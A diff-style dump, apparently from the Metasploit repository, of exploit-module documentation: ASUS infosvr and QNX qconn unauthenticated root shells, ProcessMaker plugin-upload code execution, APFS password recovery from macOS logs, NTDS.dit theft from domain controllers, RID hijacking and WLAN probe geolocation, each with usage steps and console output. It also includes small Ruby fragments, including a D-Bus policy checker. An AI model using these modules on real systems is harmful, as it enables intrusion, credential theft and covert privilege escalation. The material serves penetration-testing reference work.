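# messages to the given destination.
def allowed_senders(config_xml, dest)
  needle = %(<allow send_destination="#{dest}"/>)
  config_xml.scan(POLICY_BLOCK)
            .select { |_kind, _name, body| body.include?(needle) }
            .map { |kind, name, _body| [kind, name] }
end

# The policy excerpt quoted in the documentation.
CONFIG = <<~XML
  <policy user="root">
    <allow own="com.deepin.lastore"/>
    <allow send_destination="com.deepin.lastore"/>
  </policy>
  <policy group="sudo">
    <allow own="com.deepin.lastore"/>
    <allow send_destination="com.deepin.lastore"/>
  </policy>
XML

allowed_senders(CONFIG, 'com.deepin.lastore').each do |kind, name|
  puts "#{kind}: #{name}"
end
```

Any entry other than `user: root` in the result is worth a closer look, since it means non-root principals can call methods on the service.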

@@ -0,0 +1,78 @@
## Description

This module exploits an authentication bypass vulnerability in the infosvr service running on various ASUS routers to execute arbitrary commands as `root`.


## Vulnerable Application

The ASUS infosvr service is enabled by default on various models of ASUS routers and listens on the LAN interface on UDP port 9999. Unpatched versions of this service allow unauthenticated remote command execution as the `root` user.

This module launches the BusyBox Telnet daemon on the port specified in the `TelnetPort` option to gain an interactive remote shell.

This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35.

Numerous ASUS models are [reportedly affected](https://github.com/jduck/asus-cmd), but untested.


## Verification Steps

1. Start `msfconsole`
2. `use exploit/linux/misc/asus_infosvr_auth_bypass_exec`
3. `set RHOST [IP]`
4. `run`
5. You should get a *root* session


## Options


**TelnetPort**

The port for Telnetd to bind (default: `4444`)

**TelnetTimeout**

The number of seconds to wait for connection to telnet (default: `10`)

**TelnetBannerTimeout**

The number of seconds to wait for the telnet banner (default: `25`)

**CommandShellCleanupCommand**

A command to run before the session is closed (default: `exit`)

If the session is killed (CTRL+C) rather than exiting cleanly,
the telnet port remains open, but is unresponsive, and prevents
re-exploitation until the device is rebooted.


## Scenarios

```
msf > use exploit/linux/misc/asus_infosvr_auth_bypass_exec
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set rhost 10.1.1.1
rhost => 10.1.1.1
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set telnetport 4444
telnetport => 4444
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set verbose true
verbose => true
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > run

[*] 10.1.1.1 - Starting telnetd on port 4444...
[*] 10.1.1.1 - Waiting for telnet service to start on port 4444...
[*] 10.1.1.1 - Connecting to 10.1.1.1:4444...
[*] 10.1.1.1 - Trying to establish a telnet session...
[+] 10.1.1.1 - Telnet session successfully established...
[*] Found shell.
[*] Command shell session 1 opened (10.1.1.197:42875 -> 10.1.1.1:4444) at 2017-11-28 07:38:37 -0500

id
/bin/sh: id: not found
# cat /proc/version
cat /proc/version
Linux version 2.6.30.9 (root@wireless-desktop) (gcc version 3.4.6-1.3.6) #2 Thu Sep 18 18:12:23 CST 2014
# exit
exit
```


@ -0,0 +1,26 @@

|

|||

## Vulnerable Application

|

||||

|

||||

This module does not exploit a particular vulnerability. It passively listens

|

||||

for an incoming connection from a secondary exploit or payload. In addition,

|

||||

this module provides an unforgettable luncheon experience.

|

||||

|

||||

## Verification Steps

|

||||

|

||||

1. Start msfconsole

|

||||

2. Do: ```use exploit/multi/hams/steamed```

|

||||

3. Do: ```set payload [any payload]```

|

||||

4. Do: ```set target [0 or 1]```

|

||||

5. Do: ```exploit```

|

||||

6. Enjoy

|

||||

|

||||

## Options

|

||||

|

||||

**VERBOSE**

|

||||

|

||||

This option will further enhance the experience.

|

||||

|

||||

## Scenarios

|

||||

|

||||

Target 0: Your roast is ruined! Will fast food suffice?

|

||||

|

||||

Target 1: You crash on an alien planet. Will you ever play the piano again?

|

||||

|

|

@ -0,0 +1,88 @@

|

|||

## Description

|

||||

|

||||

This module will generate and upload a plugin to ProcessMaker resulting in execution of PHP code as the web server user.

|

||||

|

||||

Credentials for a valid user account with Administrator roles are required to run this module.

|

||||

|

||||

|

||||

## Vulnerable Application

|

||||

|

||||

[ProcessMaker](https://www.processmaker.com/) workflow management software allows public and private organizations to automate document intensive, approval-based processes across departments and systems. Business users and process experts with no programming experience can design and run workflows.

|

||||

|

||||

This module has been tested successfully on ProcessMaker versions:

|

||||

|

||||

* 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1

|

||||

* 3.2.0 on Debian Linux 8

|

||||

|

||||

Source and Installers:

|

||||

|

||||

* [ProcessMaker](https://sourceforge.net/projects/processmaker/files/ProcessMaker/)

|

||||

|

||||

|

||||

## Verification Steps

|

||||

|

||||

1. Start `msfconsole`

|

||||

2. Do: `use exploit/multi/http/processmaker_plugin_upload`

|

||||

3. Do: `set RHOST [IP]`

|

||||

4. Do: `set USERNAME [USERNAME]` (default: `admin`)

|

||||

5. Do: `set PASSWORD [PASSWORD]` (default: `admin`)

|

||||

6. Do: `set WORKSPACE [WORKSPACE]` (default: `workflow`)

|

||||

7. Do: `run`

|

||||

8. You should get a session

|

||||

|

||||

|

||||

## Options

|

||||

|

||||

**Username**

|

||||

|

||||

The username for a ProcessMaker user with Administrator roles (default: `admin`).

|

||||

|

||||

**Password**

|

||||

|

||||

The password for the ProcessMaker user (default: `admin`).

|

||||

|

||||

The default password for the `admin` user is `admin` on ProcessMaker versions 1.x and 2.x.

|

||||

|

||||

For ProcessMaker 3.x onwards, the default password is specified during installation and cannot be the same as the username.

|

||||

|

||||

However, when a new workspace is created, a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively.

|

||||

|

||||

**Workspace**

|

||||

|

||||

The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`)

|

||||

|

||||

|

||||

## Scenarios

|

||||

|

||||

```

|

||||

msf > use exploit/multi/http/processmaker_plugin_upload

|

||||

msf exploit(processmaker_plugin_upload) > set rhost 172.16.191.202

|

||||

rhost => 172.16.191.202

|

||||

msf exploit(processmaker_plugin_upload) > set username admin

|

||||

username => admin

|

||||

msf exploit(processmaker_plugin_upload) > set password admin

|

||||

password => admin

|

||||

msf exploit(processmaker_plugin_upload) > set workspace sample

|

||||

workspace => sample

|

||||

msf exploit(processmaker_plugin_upload) > set rport 8080

|

||||

rport => 8080

|

||||

msf exploit(processmaker_plugin_upload) > run

|

||||

|

||||

[*] Started reverse TCP handler on 172.16.191.181:4444

|

||||

[*] Authenticating as user 'admin'

|

||||

[+] 172.16.191.202:8080 Authenticated as user 'admin'

|

||||

[*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes)

|

||||

[*] Sending stage (33986 bytes) to 172.16.191.202

|

||||

[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400

|

||||

[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar

|

||||

[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php

|

||||

[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php

|

||||

|

||||

meterpreter > getuid

|

||||

Server username: user (1000)

|

||||

meterpreter > sysinfo

|

||||

Computer : debian

|

||||

OS : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64

|

||||

Meterpreter : php/linux

|

||||

```

|

||||

|

||||

|

|

@ -0,0 +1,60 @@

|

|||

## Description

|

||||

|

||||

This module uses the qconn daemon on [QNX](http://www.qnx.com/)

|

||||

systems to gain a shell.

|

||||

|

||||

The QNX qconn daemon does not require authentication and allows

|

||||

remote users to execute arbitrary operating system commands.

|

||||

|

||||

|

||||

## Vulnerable Application

|

||||

|

||||

The QNX qconn daemon is a service provider that provides support,

|

||||

such as profiling system information, to remote IDE components.

|

||||

|

||||

This module has been tested successfully on:

|

||||

|

||||

* QNX Neutrino 6.5.0 (x86)

|

||||

* QNX Neutrino 6.5.0 SP1 (x86)

|

||||

|

||||

QNX Neutrino 6.5.0 Service Pack 1 is available here:

|

||||

|

||||

* http://www.qnx.com/download/feature.html?programid=23665

|

||||

|

||||

|

||||

## Verification Steps

|

||||

|

||||

1. Start `msfconsole`

|

||||

2. `use exploit/unix/misc/qnx_qconn_exec`

|

||||

3. `set rhost <IP>`

|

||||

4. `set rport <PORT>`

|

||||

5. `run`

|

||||

6. You should get a session

|

||||

|

||||

|

||||

## Scenarios

|

||||

|

||||

|

||||

```

|

||||

msf5 > use exploit/unix/misc/qnx_qconn_exec

|

||||

msf5 exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215

|

||||

rhost => 172.16.191.215

|

||||

msf5 exploit(unix/misc/qnx_qconn_exec) > set rport 8000

|

||||

rport => 8000

|

||||

msf5 exploit(unix/misc/qnx_qconn_exec) > run

|

||||

|

||||

[*] 172.16.191.215:8000 - Sending payload...

|

||||

[+] 172.16.191.215:8000 - Payload sent successfully

|

||||

[*] Found shell.

|

||||

[*] Command shell session 1 opened (172.16.191.188:33641 -> 172.16.191.215:8000) at 2018-03-21 00:19:37 -0400

|

||||

|

||||

|

||||

0oxdgl2UgHIvCYBO

|

||||

# id

|

||||

id

|

||||

uid=0(root) gid=0(root)

|

||||

# uname -a

|

||||

uname -a

|

||||

QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86

|

||||

```

|

||||

|

||||

|

|

@ -0,0 +1,43 @@

|

|||

This module uses a vulnerability in macOS High Sierra's `log` command. It uses the logs of the Disk Utility app to recover the password of an APFS encrypted volume from when it was created.

|

||||

|

||||

## Vulnerable Application

|

||||

|

||||

* macOS 10.13.0

|

||||

* macOS 10.13.1

|

||||

* macOS 10.13.2

|

||||

* macOS 10.13.3*

|

||||

|

||||

|

||||

\* On macOS 10.13.3, the password can only be recovered if the drive was encrypted before the system was upgraded to 10.13.3. See [here](https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp) for more information.

|

||||

|

||||

## Verification Steps

|

||||

|

||||

Example steps (also included in the PR):

|

||||

|

||||

1. Start `msfconsole`

|

||||

2. Do: `use post/osx/gather/apfs_encrypted_volume_passwd`

|

||||

3. Do: set the `MOUNT_PATH` option if needed

|

||||

4. Do: ```run```

|

||||

5. You should get the password

|

||||

|

||||

## Options

|

||||

|

||||

**MOUNT_PATH**

|

||||

|

||||

`MOUNT_PATH` is the path on the macOS system where the encrypted drive is (or was) mounted. This is *not* the path under `/Volumes`

|

||||

|

||||

## Scenarios

|

||||

|

||||

Typical run against an OSX session, after creating a new APFS disk using Disk Utility:

|

||||

|

||||

```

|

||||

msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd

|

||||

msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1

|

||||

SESSION => -1

|

||||

msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit

|

||||

|

||||

[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .

|

||||

[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .

|

||||

[*] Post module execution completed

|

||||

msf5 post(osx/gather/apfs_encrypted_volume_passwd) >

|

||||

```
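The output above shows logged `newfs_apfs` command lines in which the password appears to follow the `-S` flag. As a rough sketch of how such a line could be post-processed (this is not the module's implementation, and `apfs_password_from_log` is a hypothetical name), a regular expression can pull out the token after `-S`. It assumes the password contains no whitespace.

```ruby
# Hypothetical helper: extracts the argument following -S from a logged
# newfs_apfs command line. Returns nil when no such command is present.
# Assumption: the password is a single whitespace-free token.
def apfs_password_from_log(line)
  line[/newfs_apfs\b.*?\s-S\s+(\S+)/, 1]
end

lines = [
  '[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .',
  '[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .'
]

# Print the recovered token for each sample line from the scenario.
lines.each { |l| puts apfs_password_from_log(l) }
```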

|

||||

|

|

@ -0,0 +1,58 @@

|

|||

## Creating A Testing Environment

|

||||

To use this module you need a Meterpreter session on a domain controller.

|

||||

The Meterpreter session must have SYSTEM privileges.

|

||||

PowerShell has to be installed.

|

||||

|

||||

This module has been tested against:

|

||||

|

||||

1. Windows Server 2008r2

|

||||

|

||||

This module was not tested against, but may work against:

|

||||

|

||||

1. Other versions of Windows server.

|

||||

|

||||

## Verification Steps

|

||||

|

||||

1. Start msfconsole

|

||||

2. Obtain a Meterpreter session on the domain controller via whatever method.

|

||||

3. Ensure the Meterpreter session has SYSTEM privileges.

|

||||

4. Ensure PowerShell is installed.

|

||||

5. Do: 'use post/windows/gather/ntds_grabber'

|

||||

6. Do: 'set session #'

|

||||

7. Do: 'run'

|

||||

|

||||

## Scenarios

|

||||

|

||||

### Windows Server 2008r2 with an x86 meterpreter

|

||||

|

||||

msf exploit(psexec) > use post/windows/gather/ntds_grabber

|

||||

msf post(ntds_grabber) > set session #

|

||||

session => #

|

||||

msf post(ntds_grabber) > run

|

||||

|

||||

[+] [2017.04.05-12:26:49] Running as SYSTEM

|

||||

[+] [2017.04.05-12:26:50] Running on a domain controller

|

||||

[+] [2017.04.05-12:26:50] PowerShell is installed.

|

||||

[-] [2017.04.05-12:26:50] The meterpreter is not the same architecture as the OS! Migrating to process matching architecture!

|

||||

[*] [2017.04.05-12:26:50] Starting new x64 process C:\windows\sysnative\svchost.exe

|

||||

[+] [2017.04.05-12:26:51] Got pid 3088

|

||||

[*] [2017.04.05-12:26:51] Migrating..

|

||||

[+] [2017.04.05-12:26:56] Success!

|

||||

[*] [2017.04.05-12:26:56] Powershell Script executed

|

||||

[*] [2017.04.05-12:26:59] Creating All.cab

|

||||

[*] [2017.04.05-12:27:01] Waiting for All.cab

|

||||

[*] [2017.04.05-12:27:02] Waiting for All.cab

|

||||

[+] [2017.04.05-12:27:02] All.cab should be created in the current working directory

|

||||

[*] [2017.04.05-12:27:05] Downloading All.cab

|

||||

[+] [2017.04.05-12:27:15] All.cab saved in: /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab

|

||||

[*] [2017.04.05-12:27:15] Removing All.cab

|

||||

[+] [2017.04.05-12:27:15] All.cab Removed

|

||||

[*] Post module execution completed

|

||||

msf post(ntds_grabber) > loot

|

||||

|

||||

Loot

|

||||

====

|

||||

|

||||

host service type name content info path

|

||||

---- ------- ---- ---- ------- ---- ----

|

||||

10.100.0.2 Cabinet File All.cab application/cab Cabinet file containing SAM, SYSTEM and NTDS.dit /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab

|

||||

|

|

@ -0,0 +1,144 @@

|

|||

## Overview

|

||||

|

||||

This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine.

|

||||

|

||||

Taking advantage of some Windows Local Users Management integrity issues, this module makes it possible to authenticate with the credentials of one known account (such as the GUEST account) and gain access with the privileges of another existing account (such as the ADMINISTRATOR account), even if the spoofed account is disabled.

|

||||

|

||||

By using a `meterpreter` session against a Windows host, the module will try to acquire _**SYSTEM**_ privileges if needed, and will modify some attributes to hijack the permissions of an existing local account and set them to another one.

|

||||

|

||||

For more information see [csl.com.co](http://csl.com.co/rid-hijacking/).

|

||||

|

||||

## Vulnerable Software

|

||||

|

||||

This module has been tested against:

|

||||

|

||||

- Windows XP, 2003. (32 bits)

|

||||

- Windows 8.1 Pro. (64 bits)

|

||||

- Windows 10. (64 bits)

|

||||

- Windows Server 2012. (64 bits)

|

||||

|

||||

This module was not tested against, but may work on:

|

||||

|

||||

- Other versions of Windows (x86 and x64).

|

||||

|

||||

## Options

|

||||

|

||||

- **GETSYSTEM**: Try to get _**SYSTEM**_ privileges on the victim. Default: `false`

|

||||

|

||||

- **GUEST_ACCOUNT**: Use the _**GUEST**_ built-in account as the destination of the privileges to be hijacked. Set this account as the _hijacker_. Default: `false`.

|

||||

|

||||

- **SESSION**: The session to run this module on. Default: `none`.

|

||||

|

||||

- **USERNAME**: Set the user account (_SAM Account Name_) of the victim host which will be the destination of the privileges to be _hijacked_. Set this account as the _hijacker_. If **GUEST_ACCOUNT** option is set to `true`, this parameter will be ignored if defined. Default: `none`.

|

||||

|

||||

- **PASSWORD**: Set or change the password of the account defined as the destination of the privileges to be hijacked, either _**GUEST**_ account or the user account set in **USERNAME** option. Set password to the _hijacker_ account. Default: `none`.

|

||||

|

||||

- **RID**: Specify the RID number in decimal of the _victim account_. This number should be the RID of an existing account on the target host, no matter if it is disabled (i.e.: The RID of the _**Administrator**_ built-in account is 500). Set the RID owned by the account that will be _hijacked_. Default: `500`
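
For readers unfamiliar with RIDs: the RID is the final numeric component of an account's SID, which is why the built-in Administrator is identified by 500 and Guest by 501 in the output shown in this document. The following sketch only illustrates that relationship and the decimal-to-hex conversion; it is not part of the module. The helper names and the sample SID are hypothetical.

```ruby
# Hypothetical helper: returns the RID (last sub-authority) of a SID string.
def rid_from_sid(sid)
  parts = sid.split('-')
  unless parts.first == 'S' && parts.length >= 4
    raise ArgumentError, "not a SID: #{sid}"
  end
  Integer(parts.last, 10)
end

# Hypothetical helper: formats a decimal RID as eight upper-case hex digits.
def rid_to_hex(rid)
  format('%08X', rid)
end

# Made-up SID used purely for illustration.
sample_sid = 'S-1-5-21-1004336348-1177238915-682003330-500'
puts rid_from_sid(sample_sid)
puts rid_to_hex(rid_from_sid(sample_sid))
```

The `RID` option itself takes the decimal form.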

|

||||

|

||||

## Verification steps

|

||||

|

||||

1. Get a `meterpreter` session on some host.

|

||||

2. Do: `use post/windows/manage/rid_hijack`

|

||||

3. Do: `set SESSION <SESSION_ID>` replacing <SESSION_ID> with the desired session.

|

||||

4. Do: `set GETSYSTEM true`.

|

||||

5. Do: `set GUEST_ACCOUNT true`.

|

||||

6. Do: `run`

|

||||

7. Log in on the victim host with the GUEST account credentials.

|

||||

|

||||

## Scenarios

|

||||

### Assigning Administrator privileges to Guest built-in account.

|

||||

```

|

||||

msf post(rid_hijack) > set GETSYSTEM true

|

||||

GETSYSTEM => true

|

||||

msf post(rid_hijack) > set GUEST_ACCOUNT true

|

||||

GUEST_ACCOUNT => true

|

||||

msf post(rid_hijack) > set SESSION 1

|

||||

SESSION => 1

|

||||

msf post(rid_hijack) > run

|

||||

|

||||

[*] Checking for SYSTEM privileges on session

|

||||

[+] Session is already running with SYSTEM privileges

|

||||

[*] Target OS: Windows 8.1 (Build 9600).

|

||||

[*] Target account: Guest Account

|

||||

[*] Target account username: Invitado

|

||||

[*] Target account RID: 501

|

||||

[*] Account is disabled, activating...

|

||||

[+] Target account enabled

|

||||

[*] Overwriting RID

|

||||

[+] The RID 500 is set to the account Invitado with original RID 501

|

||||

[*] Post module execution completed

|

||||

```

|

||||



#### Results after logging in as the Guest account.

|

||||

|

||||

|

||||

|

||||

### Assigning Administrator privileges to local custom account.

|

||||

```

|

||||

msf post(rid_hijack) > set GETSYSTEM true

|

||||

GETSYSTEM => true

|

||||

msf post(rid_hijack) > set GUEST_ACCOUNT false

|

||||

GUEST_ACCOUNT => false

|

||||

msf post(rid_hijack) > set USERNAME testuser

|

||||

USERNAME => testuser

|

||||

msf post(rid_hijack) > run

|

||||

|

||||

[*] Checking for SYSTEM privileges on session

|

||||

[+] Session is already running with SYSTEM privileges

|

||||

[*] Target OS: Windows 8.1 (Build 9600).

|

||||

[*] Checking users...

|

||||

[+] Found testuser account!

|

||||

[*] Target account username: testuser

|

||||

[*] Target account RID: 1002

|

||||

[+] Target account is already enabled

|

||||

[*] Overwriting RID

|

||||

[+] The RID 500 is set to the account testuser with original RID 1002

|

||||

[*] Post module execution completed

|

||||

```

|

||||

#### Results after logging in as the _testuser_ account.

|

||||

|

||||

|

||||

### Assigning custom privileges to Guest built-in account and setting new password to Guest.

|

||||

```

|

||||

msf post(rid_hijack) > set GUEST_ACCOUNT true

|

||||

GUEST_ACCOUNT => true

|

||||

msf post(rid_hijack) > set RID 1002

|

||||

RID => 1002

|

||||

msf post(rid_hijack) > set PASSWORD Password.1

|

||||

PASSWORD => Password.1

|

||||

msf post(rid_hijack) > run

|

||||

|

||||

[*] Checking for SYSTEM privileges on session

|

||||

[+] Session is already running with SYSTEM privileges

|

||||

[*] Target OS: Windows 8.1 (Build 9600).

|

||||

[*] Target account: Guest Account

|

||||

[*] Target account username: Invitado

|

||||

[*] Target account RID: 501

|

||||

[+] Target account is already enabled

|

||||

[*] Overwriting RID

|

||||

[+] The RID 1002 is set to the account Invitado with original RID 501

|

||||

[*] Setting Invitado password to Password.1

|

||||

[*] Post module execution completed

|

||||

```

|

||||

### Assigning custom privileges to local custom account and setting new password to custom account.

|

||||

```

|

||||

msf post(rid_hijack) > set GUEST_ACCOUNT false

|

||||

GUEST_ACCOUNT => false

|

||||

msf post(rid_hijack) > set USERNAME testuser

|

||||

USERNAME => testuser

|

||||

msf post(rid_hijack) > set PASSWORD Password.2

|

||||

PASSWORD => Password.2

|

||||

msf post(rid_hijack) > run

|

||||

|

||||

[*] Checking for SYSTEM privileges on session

|

||||

[+] Session is already running with SYSTEM privileges

|

||||

[*] Target OS: Windows 8.1 (Build 9600).

|

||||

[*] Checking users...

|

||||

[+] Found testuser account!

|

||||

[*] Target account username: testuser

|

||||

[*] Target account RID: 1002

|

||||

[+] Target account is already enabled

|

||||

[*] Overwriting RID

|

||||

[+] The RID 1002 is set to the account testuser with original RID 1002

|

||||

[*] Setting testuser password to Password.2

|

||||

[*] Post module execution completed

|

||||

```

|

||||

|

|

@ -0,0 +1,113 @@

|

|||

## Description

|

||||

The module sends probe request packets through the wlan interfaces. The user can configure the message to be sent

|

||||

(embedded in the SSID field) with a max length of 32 bytes and the time spent in seconds sending those packets

|

||||

(considering a sleep of 10 seconds between each probe request).

|

||||

|

||||

The module borrows most of its code from the @thelightcosine wlan_* modules (everything revolves around the

|

||||

wlanscan API and the DOT11_SSID structure).
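
To make the 32-byte limit concrete: the Windows `DOT11_SSID` structure holds a 32-bit length followed by a fixed 32-byte SSID buffer. The sketch below packs a message into that layout. It illustrates the structure only and is not the module's code; `pack_dot11_ssid` is a hypothetical helper name.

```ruby
DOT11_SSID_MAX_LENGTH = 32

# Hypothetical helper: packs an SSID into the DOT11_SSID layout, a
# little-endian 32-bit length followed by a 32-byte, NUL-padded buffer.
def pack_dot11_ssid(ssid)
  bytes = ssid.b # work on raw bytes, not characters
  if bytes.bytesize > DOT11_SSID_MAX_LENGTH
    raise ArgumentError, 'SSID longer than 32 bytes'
  end
  [bytes.bytesize, bytes].pack('Va32')
end

packed = pack_dot11_ssid('TEST')
puts packed.bytesize
```

Because the limit is counted in bytes, a message containing multi-byte characters can hit it with fewer than 32 characters.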

|

||||

|

||||

## Scenarios

|

||||

|

||||

This post module uses the remote victim's wireless card to beacon a specific SSID, allowing an attacker to

|

||||

geolocate him or her during an engagement.

|

||||

|

||||

## Verification steps:

|

||||

### Run the module on a remote computer:

|

||||

```

|

||||

msf exploit(ms17_010_eternalblue) > use exploit/multi/handler

|

||||

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

|

||||

payload => windows/meterpreter/reverse_tcp

|

||||

msf exploit(handler) > set lhost 192.168.135.111

|

||||

lhost => 192.168.135.111

|

||||

msf exploit(handler) > set lport 4567

|

||||

lport => 4567

|

||||

msf exploit(handler) > run

|

||||

|

||||

[*] Started reverse TCP handler on 192.168.135.111:4567

|

||||

[*] Starting the payload handler...

|

||||

[*] Sending stage (957487 bytes) to 192.168.135.157

|

||||

[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.135.157:50661) at 2018-04-20 13:20:34 -0500

|

||||

|

||||

meterpreter > sysinfo

|

||||

Computer : WIN10X64-1703

|

||||

OS : Windows 10 (Build 15063).

|

||||

Architecture : x64

|

||||

System Language : en_US

|

||||

Domain : WORKGROUP

|

||||

Logged On Users : 2

|

||||

Meterpreter : x86/windows

|

||||

meterpreter > background

|

||||

[*] Backgrounding session 1...

|

||||

msf exploit(handler) > use post/windows/wlan/wlan_probe_request

|

||||

msf post(wlan_probe_request) > set ssid "TEST"

|

||||

ssid => TEST

|

||||

msf post(wlan_probe_request) > set timeout 300

|

||||

timeout => 300

|

||||

msf post(wlan_probe_request) > set session 1

|

||||

session => 1

|

||||

msf post(wlan_probe_request) > run

|

||||

|

||||

[*] Wlan interfaces found: 1

|

||||

[*] Sending probe requests for 300 seconds

|

||||

^C[-] Post interrupted by the console user

|

||||

[*] Post module execution completed

|

||||

msf post(wlan_probe_request) >

|

||||

```

|

||||

|

||||

|

||||

|

||||

### On another computer, use probemon to listen for the SSID:

|

||||

```

|

||||

tmoose@ubuntu:~/rapid7$ ifconfig -a

|

||||

.

|

||||

.

|

||||

.

|

||||

wlx00c0ca6d1287 Link encap:Ethernet HWaddr 00:00:00:00:00:00

|

||||

UP BROADCAST MULTICAST MTU:1500 Metric:1

|

||||

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

|

||||

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

|

||||

collisions:0 txqueuelen:1000

|

||||

RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

|

||||

|

||||

tmoose@ubuntu:~/rapid7$ sudo airmon-ng start wlx00c0ca6d1287

|

||||

|

||||

|

||||

Found 6 processes that could cause trouble.

|

||||

If airodump-ng, aireplay-ng or airtun-ng stops working after

|

||||

a short period of time, you may want to kill (some of) them!

|

||||

|

||||

PID Name

|

||||

963 NetworkManager

|

||||

981 avahi-daemon

|

||||

1002 avahi-daemon

|

||||

1170 dhclient

|

||||

1180 dhclient

|

||||

1766 wpa_supplicant

|

||||

|

||||

|

||||

Interface Chipset Driver

|

||||

|

||||

wlx000000000000 Realtek RTL8187L rtl8187 - [phy0]

|

||||

(monitor mode enabled on mon0)

|

||||

|

||||

tmoose@ubuntu:~/rapid7$ cd ..

|

||||

|

||||

tmoose@ubuntu:~$ sudo python probemon.py -t unix -i mon0 -s -r -l | grep TEST

|

||||

1524248955 74:ea:3a:8e:a1:6d TEST -59

|

||||

1524248955 74:ea:3a:8e:a1:6d TEST -73

|

||||

1524248955 74:ea:3a:8e:a1:6d TEST -63

|

||||

1524248955 74:ea:3a:8e:a1:6d TEST -68

|

||||

1524248956 74:ea:3a:8e:a1:6d TEST -74

|

||||

1524248965 74:ea:3a:8e:a1:6d TEST -59

|

||||

1524248965 74:ea:3a:8e:a1:6d TEST -60

|

||||

1524248965 74:ea:3a:8e:a1:6d TEST -74

|

||||

1524248965 74:ea:3a:8e:a1:6d TEST -73

|

||||

1524248965 74:ea:3a:8e:a1:6d TEST -63

|

||||

1524248965 74:ea:3a:8e:a1:6d TEST -63

|

||||

1524248965 74:ea:3a:8e:a1:6d TEST -78

|

||||

|

||||

.

|

||||

.

|

||||

.

|

||||

|

||||

```
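The captured lines above can be post-processed to see when and how strongly the SSID was heard. This is a small sketch under assumptions: the four whitespace-separated columns are taken to be a Unix timestamp, the sender MAC address, the SSID, and a signal strength value, and the SSID is assumed to contain no spaces. `ProbeRecord` and `parse_probemon_line` are hypothetical names.

```ruby
ProbeRecord = Struct.new(:time, :mac, :ssid, :rssi)

# Hypothetical helper: parses one captured line into a ProbeRecord.
# Returns nil for lines that do not have four fields (such as "." filler).
def parse_probemon_line(line)
  ts, mac, ssid, rssi = line.split
  return nil unless ts && mac && ssid && rssi

  ProbeRecord.new(Time.at(Integer(ts, 10)).utc, mac, ssid, Integer(rssi, 10))
end

record = parse_probemon_line('1524248955 74:ea:3a:8e:a1:6d TEST -59')
puts record.time
puts record.rssi
```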

|

||||

|

|

@ -27,11 +27,15 @@ module DataService

|

|||

include LootDataService

|

||||

|

||||

def name

|

||||

raise 'DataLService#name is not implemented';

|

||||

raise 'DataService#name is not implemented';

|

||||

end

|

||||

|

||||

def active

|

||||

raise 'DataLService#active is not implemented';

|

||||

raise 'DataService#active is not implemented';

|

||||

end

|

||||

|

||||

def is_local?

|

||||

raise 'DataService#is_local? is not implemented';

|

||||

end

|

||||

|

||||

#

|

||||

|

|

@ -41,11 +45,14 @@ module DataService

|

|||

attr_reader :id

|

||||

attr_reader :name

|

||||

attr_reader :active

|

||||

attr_reader :is_local

|

||||

|

||||

def initialize (id, name, active)

|

||||

def initialize (id, name, active, is_local)

|

||||

self.id = id

|

||||

self.name = name

|

||||

self.active = active

|

||||

self.is_local = is_local

|

||||

|

||||

end

|

||||

|

||||

#######

|

||||

|

|

@ -55,6 +62,7 @@ module DataService

|

|||

attr_writer :id

|

||||

attr_writer :name

|

||||

attr_writer :active

|

||||

attr_writer :is_local

|

||||

|

||||

end

|

||||

end
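
Read together, the added lines in the hunks above give the metadata holder a fourth attribute, `is_local`. The sketch below shows roughly how such a class might look after the change. It is a stand-alone approximation: the class name `DataServiceMetadata` is hypothetical, and placing the writers under `private` is an assumption, since the surrounding lines are not visible in the diff.

```ruby
# Hypothetical stand-alone approximation of the metadata holder.
class DataServiceMetadata
  attr_reader :id, :name, :active, :is_local

  def initialize(id, name, active, is_local)
    # Private setters may be called with an explicit `self` receiver.
    self.id = id
    self.name = name
    self.active = active
    self.is_local = is_local
  end

  private

  # Assumption: writers are private so metadata is read-only to callers.
  attr_writer :id, :name, :active, :is_local
end

meta = DataServiceMetadata.new(1, 'local_db_service', true, true)
puts meta.is_local
```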

|

||||

|

|

|

|||

|

|

@ -27,13 +27,13 @@ class DataProxy

|

|||

#

|

||||

def error

|

||||

return @error if (@error)

|

||||

return @current_data_service.error if @current_data_service

|